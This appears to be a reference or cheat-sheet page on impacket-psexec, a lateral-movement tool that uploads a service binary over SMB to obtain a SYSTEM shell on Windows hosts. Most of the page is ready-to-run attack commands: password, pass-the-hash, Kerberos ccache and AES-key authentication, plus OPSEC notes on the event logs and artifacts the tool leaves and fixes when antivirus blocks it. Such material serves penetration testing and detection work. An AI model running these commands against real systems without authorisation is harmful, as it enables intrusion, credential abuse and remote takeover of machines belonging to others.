Skip to main content

Overview

impacket-psexec uploads an executable to the ADMIN$ share, creates a Windows service to run it, and returns a SYSTEM-level interactive shell over SMB (port 445). It is the noisiest of the Impacket exec tools but provides full interactive access.

Authentication Methods

MethodFlagExample
Password(default)domain/user:password@target
NTLM hash-hashes-hashes :NT_HASH
Kerberos-k -no-pass-k -no-pass -dc-ip DC_IP
AES key-aesKey-aesKey AES256_KEY

Basic Usage — Interactive Shell

impacket-psexec domain.local/administrator:[email protected]
Local admin (no domain): 
impacket-psexec ./administrator:[email protected]

Execute Specific Command

impacket-psexec domain.local/administrator:[email protected] "whoami"
Run a PowerShell command: 
impacket-psexec domain.local/administrator:[email protected] "powershell -c Get-Process"

How It Works

  1. Authenticates to the target via SMB (port 445).
  2. Connects to the ADMIN$ share (C:\Windows).
  3. Uploads a service binary (RemComSvc) to ADMIN$.
  4. Creates a Windows service pointing to the uploaded binary via the Service Control Manager (SCM).
  5. Starts the service, which spawns cmd.exe as SYSTEM.
  6. Communicates I/O through named pipes over SMB.
  7. On exit, stops the service, deletes it, and removes the uploaded binary.

OPSEC Considerations

IndicatorDetail
Service creationCreates RemComSvc service (event 7045)
Binary on diskWrites executable to C:\Windows
Event logsService install in System log, logon in Security log (4624 type 3)
DetectionEasily flagged by EDR/AV — binary is well-signatured
Noise levelHigh — most detectable of the three exec tools
Artifacts to expect:
  • System Event ID 7045 (new service installed)
  • Security Event ID 4624 (network logon type 3)
  • Security Event ID 4672 (special privileges assigned)
  • File creation under C:\Windows\

Pass-the-Hash

impacket-psexec -hashes :64f12cddaa88057e06a81b54e73b949b domain.local/[email protected]
With both LM and NT hash: 
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b domain.local/[email protected]

Kerberos Authentication

Requires a valid ccache file or keytab. 
export KRB5CCNAME=/tmp/administrator.ccache
impacket-psexec -k -no-pass domain.local/[email protected]
With explicit DC IP: 
impacket-psexec -k -no-pass -dc-ip 10.10.10.1 domain.local/[email protected] -target-ip 10.10.10.5
Using AES key directly: 
impacket-psexec -aesKey 2a62271bdc6226c1106c1ed8dcb554cbf46fb99dda304c472569218c125d9ffc domain.local/[email protected] -k -no-pass

Target Specific Port

impacket-psexec -port 4455 domain.local/administrator:[email protected]

Common Errors and Fixes

ErrorCauseFix
STATUS_ACCESS_DENIEDUser lacks local admin or ADMIN$ accessVerify local admin membership
STATUS_SHARING_VIOLATIONPrevious RemComSvc binary not cleaned upManually delete from C:\Windows
ERROR_SERVICE_EXISTSStale service from previous runsc.exe delete RemComSvc on target
Connection refusedSMB port 445 blockedCheck firewall, try -port
KDC_ERR_PREAUTH_FAILEDWrong password or expired ticketVerify creds, regenerate ccache
SessionError: STATUS_LOGON_FAILUREIncorrect credentialsDouble-check password/hash
Hangs after connectionAV/EDR killed the uploaded binaryTry wmiexec or smbexec instead

Quick Reference

# Interactive shell with password
impacket-psexec domain.local/user:pass@TARGET

# Interactive shell with hash (pass-the-hash)
impacket-psexec -hashes :NTHASH domain.local/user@TARGET

# Interactive shell with Kerberos
export KRB5CCNAME=/tmp/user.ccache
impacket-psexec -k -no-pass domain.local/user@TARGET_FQDN

# Run single command
impacket-psexec domain.local/user:pass@TARGET "ipconfig /all"

# Custom port
impacket-psexec -port 4455 domain.local/user:pass@TARGET

# With explicit DC for Kerberos
impacket-psexec -k -no-pass -dc-ip DC_IP domain.local/user@TARGET_FQDN